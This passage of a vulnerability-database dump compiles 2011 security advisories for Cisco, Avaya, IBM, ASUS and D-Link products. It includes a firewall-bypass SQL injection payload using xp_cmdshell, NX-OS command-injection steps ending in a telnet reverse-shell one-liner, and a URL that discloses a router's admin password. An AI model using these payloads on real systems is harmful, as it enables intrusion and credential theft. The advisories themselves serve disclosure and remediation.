|------------+------------------+----------------------------|
| 15.1XB | Not vulnerable | Vulnerable; First fixed in |
| | | Release 15.1T |
|------------+------------------+----------------------------|
| Affected | | First Fixed Release for |
| 15.2-Based | First Fixed | All Advisories in the |
| Releases | Release | September 2011 Bundled |
| | | Publication |
|------------------------------------------------------------|
| There are no affected 15.2 based releases |
+------------------------------------------------------------+
Cisco IOS XE Software
+--------------------
Cisco IOS XE Software is not affected by the vulnerability disclosed
in this advisory.
Cisco IOS XR Software
+--------------------
Cisco IOS XR Software is not affected by the vulnerability disclosed
in this advisory.
Cisco IOS XR Software is not affected by the vulnerabilities
disclosed in the September 28, 2011, Cisco IOS Software Security
Advisory bundled publication.
Workarounds
===========
Traffic destined to the device or transit traffic could trigger the
effects of this vulnerability. Subsequently, the only workaround
available is to block ICMP packets destined to the affected device
and all ICMP transit traffic.
Obtaining Fixed Software
========================
Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was discovered while troubleshooting a customer
service request.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20110928-c10k.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2011-September-28 | Initial public release |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/ go/psirt.
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAk6Cp14ACgkQQXnnBKKRMNBOWAD/YQDJsUpQlEAe+4lUl7/WGqtg
yCddHaRTE9faZTPn4OkA+weoFjsiEbq4xztfYsQkSsApLSXq4/WdiUCfd/tucqrW
=kYjE
-----END PGP SIGNATURE-----
| VAR-201108-0204 | CVE-2011-3008 | Avaya Secure Access Link (SAL) Gateway information disclosure vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The default configuration of Avaya Secure Access Link (SAL) Gateway 1.5, 1.8, and 2.0 contains certain domain names in the Secondary Core Server URL and Secondary Remote Server URL fields, which allows remote attackers to obtain sensitive information by leveraging administrative access to these domain names, as demonstrated by alarm and log information. Avaya Provided by Secure Access Link (SAL) Gateway Contains an information disclosure vulnerability. Avaya Provided by Secure Access Link (SAL) Gateway Has a problem with the default settings during installation. Avaya Has released the following vulnerability information. These servers resolve to invalid domains and pose a security threat. Secondary Core Server URL should be same as the primary Core Server URL and Secondary Remote Server URL should be same as the primary Remote Server URL."Information such as logs is not intended E-mail May be sent to the address. No need to surrender free access, this service allows you to initiate a communication connection from your own network and choose the best provider for your business. To exploit this vulnerability, an attacker would need a malicious email server with the 'secavaya.com' and 'secaxeda.com' domain names to get warnings and log information.
Exploiting this issue may allow an attacker to access sensitive information that may aid in further attacks
| VAR-201108-0125 | CVE-2011-3140 | IBM Web Application Firewall Security Bypass Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IBM Web Application Firewall, as used on the G400 IPS-G400-IB-1 and GX4004 IPS-GX4004-IB-2 appliances with update 31.030, does not properly handle query strings with multiple instances of the same parameter, which allows remote attackers to bypass intended intrusion prevention by dividing a dangerous parameter value into substrings, as demonstrated by a SQL statement that is split across multiple iid parameters and then sent to a .aspx file on an IIS web server. IBM Web Application Firewall is prone to a security-bypass vulnerability.
Successfully exploiting this issue will allow attackers to bypass security restrictions and perform unauthorized actions. Remote attackers can bypass preset intrusion defenses by splitting dangerous parameters into multiple substrings.
Versions affected:
Tested against G400 IPS-G400-IB-1 (Intrusion Prevention
Update: 2011-03-11 00:34:23 - version: 31.030) and GX4004 IPS-GX4004-IB-2
(Intrusion Prevention Update: 2011-03-10 23:49:15 - version: 31.030). The issue
occurs when an attacker submits repeated occurrences of the same parameter.
The example shown below uses the following environment:
A web environment using Microsoft IIS, ASP .NET technology, Microsoft
SQL Server 2000, being protected by the IBM Web Application Firewall.
http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC
master..xp_cmdshell "ping 10.1.1.3" --
IIS with ASP.NET (and even pure ASP) technology will concatenate the
contents
of a parameter if multiple entries are part of the request.
http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC
master..xp_cmdshell &iid= "ping 10.1.1.3" --
IIS with ASP.NET (and even pure ASP) technology will concatenate both
entries of iid parameter, however it will include an comma "," between
them, resulting in the following output being sent to the database.
'; EXEC master..xp_cmdshell , "ping 10.1.1.3" --
The request above will be identified and blocked (depending of
configuration) by IBM Web application firewall, because it appears that
"EXEC" and "xp_cmdshell" trigger an attack pattern.
However, it is possible to split all the spaces in multiple parameters. For
example:
http://sitename/find_ta_def.aspx?id=2571&iid='; &iid= EXEC
&iid= master..xp_cmdshell &iid= "ping 10.1.1.3" &iid= --
The above request will bypass the affected IBM Web application firewall,
resulting in the following output being sent to the database.
'; , EXEC , master..xp_cmdshell , "ping 10.1.1.3" , --
However, the above SQL code will not be properly executed because of the
comma inserted on the SQL query, to solve this situation we will use SQL
comments.
http://sitename/find_ta_def.aspx?id=2571&iid='; /*&iid=1*/ EXEC
/*&iid=1*/ master..xp_cmdshell /*&iid=1*/ "ping 10.1.1.3" /*&iid=1*/ --
The above request will bypass IBM Web application firewall, resulting in
the following output being sent to the database, which is a valid and
working SQL code.
'; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "ping 10.1.1.3" /*,1*/ --
The above code will execute the ping command on the Microsoft Windows
backend, assuming the application was running with administrative
privileges.
This attack class is also referenced sometimes as HTTP Pollution Attack,
HTTP Parameter Pollution (HPP) and HTTP Parameter Concatenation.
The exploitability of this issue depends of the infrastructure (WebServer,
Development Framework Technology, etc) technology being used.
Remediation Steps:
IBM has released fixes to the above issue in the "Super Tuesday" patch
released in June. Refer to the references section of the advisory for
further information released by IBM.
Revision History:
04/07/11 - Vulnerability disclosed
06/16/11 - Patch released
06/21/11 - Advisory published
References:
1.
http://www.iss.net/security_center/reference/vuln/HTTP_Parameter_Abuse.htm
2. http://xforce.iss.net/xforce/xfdb/67178
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201111-0176 | CVE-2011-4497 | ASUS RT-N56U Wireless Router 'QIS_wizard.htm' Password Information Disclosure Vulnerability |
CVSS V2: 3.3 CVSS V3: - Severity: LOW |
QIS_wizard.htm on the ASUS RT-N56U router with firmware before 1.0.1.4o allows remote attackers to obtain the administrator password via a flag=detect request. ASUS Provided by RT-N56U Contains an administrative password disclosure vulnerability. ASUS Provided by RT-N56U Is a gigabit compatible wireless router. RT-N56U Contains a management password disclosure vulnerability because authentication is not required to connect to the configuration page that contains the device's management password. Note that you can connect to this device by default. LAN Only for users within.An administrative password may be obtained by a remote third party. An attacker with access to the device can access the http://RouterIPAddress/QIS_wizard.htm?flag=detect page. An attacker can obtain device configuration without entering login credentials. This web page will display the device administrator password. By default, only clients connected to the local domain network (LAN) are allowed to access the system WEB interface.
ASUS RT-N56U firmware version 1.0.1.4 is vulnerable. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
ASUS RT-N56U Wireless Router "QIS_wizard.htm" Information Disclosure
SECUNIA ADVISORY ID:
SA45714
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45714/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45714
RELEASE DATE:
2011-08-26
DISCUSS ADVISORY:
http://secunia.com/advisories/45714/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45714/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45714
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A security issue has been reported in the Asus RT-N56U Wireless
Router, which can be exploited by malicious people to disclose
sensitive information.
The security issue is caused due to the router not restricting access
to a page displaying the device's configuration
(QIS_wizard.htm?flag=detect) and can be exploited to disclose
sensitive information including the device's administrative
password.
SOLUTION:
Update to firmware version 1.0.1.4o
PROVIDED AND/OR DISCOVERED BY:
Plucky via US-CERT.
ORIGINAL ADVISORY:
US-CERT:
http://www.kb.cert.org/vuls/id/200814
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201110-0195 | CVE-2011-2569 |
Cisco Nexus OS and Cisco Unified Computing System Vulnerability gained in
Related entries in the VARIoT exploits database: VAR-E-201110-0040 |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188. The problem is Bug ID CSCtf40008 , CSCtg18363 , CSCtr44645 , CSCts10195 ,and CSCts10188 It is a problem.Authority may be obtained by local users. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. The section command is used as an AWK script to pass the request string, but the input is not fully filtered. Any command can be executed on the LINUX subsystem. nx1# sh clock | sed 's/.*/BEGIN \\{ system\\(\\\"id \"\\) \\}/' > 20110713.awk Warning: There is already a file existing with this name. Do you want to overwrite (yes/no)? [no] y nx1# sh clock | sec '* -f /bootflash /20110713.awk ' uid=2003(user) gid=504(network-operator) 11:16:04.082 UTC Wed Jul 13 2011 nx1# sh clock | sed 's/.*/BEGIN \\{ system\\(\\\"ls \\/mnt\\/cfg\\/0\\/\"\\) \\}/' > 20110713.awk nx1# sh clock | sec '* -f /bootflash/20110713.awk ' ascii bin boot cfglabel.sysmgr debug licenses linux log lost +found 11:18:41.885 UTC Wed Jul 13 2011 can be used to delete any file in the boot flash or send the 'reboot' command. In addition, the less command Han total, press the colon and press the \"e\" key to specify the file path to be opened. You can view any system file: bin:*:1:1:bin:/bin: daemon:*:2:2:daemon :/usr/sbin: sys:*:3:3:sys:/dev: ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash ftpuser:UvdRSOzORvz9o:99:14:ftpuser: /var/ftp:/isanboot/bin/nobash nobody:*:65534:65534:nobody:/home:/bin/sh admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm Use \"|\" (pipe) and then press the \"$\" macro key to execute the command: !ls -lah > /bootflash/20110715 You can also create a remote shell by doing the following: mknod rs p; telnet ad.dr.es. s 8888 0<rs | /bin/bash 1>rs.
A local attacker can exploit these issues to execute arbitrary commands with administrative privileges. Successful exploits may compromise the affected computer.
Cisco MDS, UCS, Nexus 7000, 5000, 4000, 3000, 2000, and 1000V are vulnerable; other versions may also be affected
| VAR-201111-0163 | CVE-2011-4507 | D-Link DIR-685 Xtreme N storage router WPA/WPA2 encryption failure |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The D-Link DIR-685 router, when certain WPA and WPA2 configurations are used, does not maintain an encrypted wireless network during transfer of a large amount of network traffic, which allows remote attackers to obtain sensitive information or bypass authentication via a Wi-Fi device. D-Link DIR-685 Xtreme N Storage Router Is WPA/WPA2 There is a vulnerability in which communication is performed without encryption even if it is set. D-Link DIR-685 Xtreme N Storage Router Is AES Using crypto WPA-PSK, WPA2-PSK Even if it is set to communicate with, there is a vulnerability that communication is performed without encryption under heavy load conditions such as huge data transmission processing. After that, communication is not encrypted until the device is restarted.Radio of applicable equipment LAN Communication contents may be intercepted by a third party within reach. The D-Link DIR-685 is a wireless router device. The device needs to be restarted to restore the original encryption state. D-Link DIR-685 is prone to an authentication-bypass vulnerability.
Attackers can exploit this issue to connect to the affected device without authentication. This may aid in further attacks. D-Link is a network company founded by Taiwan D-Link Group, dedicated to the R&D, production and marketing of LAN, broadband network, wireless network, voice network and related network equipment. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
D-Link DIR-685 Xtreme N Storage Router Encryption Failure Weakness
SECUNIA ADVISORY ID:
SA46380
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46380/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46380
RELEASE DATE:
2011-10-13
DISCUSS ADVISORY:
http://secunia.com/advisories/46380/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46380/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46380
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A weakness has been reported in D-Link DIR-685 Xtreme N Storage
Router, which can be exploited by malicious people to bypass certain
security restrictions.
The weakness is caused due to an error in the router when configured
with WPA/WPA2 and an AES pre-shared key (PSK) cipher.
SOLUTION:
Do not use an AES pre-shared key (PSK) cipher.
PROVIDED AND/OR DISCOVERED BY:
Jerry Decime via US-CERT.
ORIGINAL ADVISORY:
US-CERT:
http://www.kb.cert.org/vuls/id/924307
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201111-0147 | CVE-2011-4005 | Cisco Small Business Vulnerable to cross-site request forgery |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Cross-site request forgery (CSRF) vulnerability in the Services Ready Platform Configuration Utility web interface on the Cisco Small Business SRP521W, SRP526W, and SRP527W with firmware before 1.1.24 and the Small Business SRP541W, SRP546W, and SRP547W with firmware before 1.2.1 allows remote attackers to hijack the authentication of administrators for requests that execute arbitrary commands, aka Bug ID CSCtr45124. The problem is ID CSCtr45124 It is a problem.A third party may be able to hijack the administrator's authentication requesting the execution of arbitrary commands. Cisco Small Business SRP500 Series Appliances are prone to a remote command-injection vulnerability.
Successful exploits will result in the execution of arbitrary attacker-supplied commands in the context of the root user. This may facilitate a complete compromise.
This issue is being tracked by Cisco bug ID CSCtr45124. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
Cisco Small Business SRP520 / SRP540 Series Command Injection
Vulnerability
SECUNIA ADVISORY ID:
SA46664
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46664/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46664
RELEASE DATE:
2011-11-03
DISCUSS ADVISORY:
http://secunia.com/advisories/46664/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46664/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46664
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Cisco Small Business SRP520 /
SRP540 series, which can be exploited by malicious people to
compromise a vulnerable system. by tricking a logged-in administrator into
following a malicious link.
* Cisco SRP526W versions prior to 1.1.24.
* Cisco SRP527W versions prior to 1.1.24.
* Cisco SRP541W versions prior to 1.2.1.
* Cisco SRP546W versions prior to 1.2.1.
* Cisco SRP547W versions prior to 1.2.1.
SOLUTION:
Update to version 1.1.24 or 1.2.1.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Michal Sajdak, Securitum.
ORIGINAL ADVISORY:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111102-srp500
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Advisory: Cisco Small Business SRP500 Series Command
Injection Vulnerability
Advisory ID: cisco-sa-20111102-srp500
Revision 1.0
For Public Release 2011 November 2 16:00 UTC (GMT)
+--------------------------------------------------------------------
Summary
=======
Cisco Small Business SRP500 Series Services Ready Platforms contain an
operating system command injection vulnerability.
Cisco has released free software updates that address this
vulnerability.
Workarounds that mitigate this vulnerability are available.
This advisory is posted at
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111102-srp500.
Affected Products
=================
Vulnerable Products
+------------------
The following Cisco Small Business SRP520 Series models are affected
if running firmware prior to version 1.1.24:
* Cisco SRP521W
* Cisco SRP526W
* Cisco SRP527W
The following Cisco Small Business SRP540 Series models are affected if
running firmware prior to version 1.2.1:
* Cisco SRP541W
* Cisco SRP546W
* Cisco SRP547W
To view the firmware version on a device, log in to the Services Ready
Platform Configuration Utility and navigate to the "Status > Router"
page to view information about the SRP and its firmware status. The
"Firmware Version" field indicates the current running version of
firmware on the SRP500 Series device.
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by this
vulnerability.
Details
=======
Cisco Small Business SRP500 Series Services Ready Platforms are
flexible, cost-effective, fixed-configuration customer premises
equipment (CPE) with embedded intelligence to enable service providers
to create, provision, and deploy premium revenue-generating
services -- a variety of high-quality IP voice, data, security, and
wireless services -- to small businesses on an as-needed basis.
For this vulnerability to be exploited, a remote attacker must
either entice an administrator to access a crafted link or perform a
man-in-the-middle attack, intercepting an authenticated session.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCtr45124 ("Cisco Small Business SRP500 Series Services Ready
Platforms Command Injection Vulnerability")
CVSS Base Score - 9.3
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerability may result in the execution
of arbitrary commands on the device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Small Business Support Center or your contracted maintenance
provider for assistance.
This vulnerability has been fixed in the following firmware
versions:
+------------------------------------------------------------+
| Affected Product | First Fixed Release |
|--------------------------+---------------------------------|
| Cisco SRP521W | 1.1.24 |
|--------------------------+---------------------------------|
| Cisco SRP526W | 1.1.24 |
|--------------------------+---------------------------------|
| Cisco SRP527W | 1.1.24 |
|--------------------------+---------------------------------|
| Cisco SRP541W | 1.2.1 |
|--------------------------+---------------------------------|
| Cisco SRP546W | 1.2.1 |
|--------------------------+---------------------------------|
| Cisco SRP547W | 1.2.1 |
+------------------------------------------------------------+
The latest Cisco Small Business SRP500 Series Services Ready
Platforms firmware can be downloaded at
http://www.cisco.com/cisco/software/navigator.html?mdfid=282736194&i=rm
Workarounds
===========
The following mitigations help limit exposure to this vulnerability.
* Disable Remote Management
Caution: Do not disable remote management if administrators
manage devices via the WAN connection. This action will result in
a loss of management connectivity to the device.
Remote Management is enabled by default. Administrators can disable
this feature by choosing "Administration > Web Access Management".
Change the setting for the Remote Management field to Disabled.
Disabling remote management limits exposure because the
vulnerability can then be exploited from the inter-LAN network only.
* Limit Remote Management Access to Specific IP Addresses
If remote management is required, secure the device so that it can
be accessed by certain IP addresses only, rather than the default
setting of All IP Addresses. After choosing "Administration > Web
Access Management", an administrator can change the Allowed Remote
IP Address setting to ensure that only devices with specified IP
addresses can access the device.
Obtaining Fixed Software
========================
Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers should obtain upgraded software through their regular
update channels. For most customers, this means that upgrades should
be obtained through the Software Center on Cisco's worldwide website
at http://www.cisco.com.
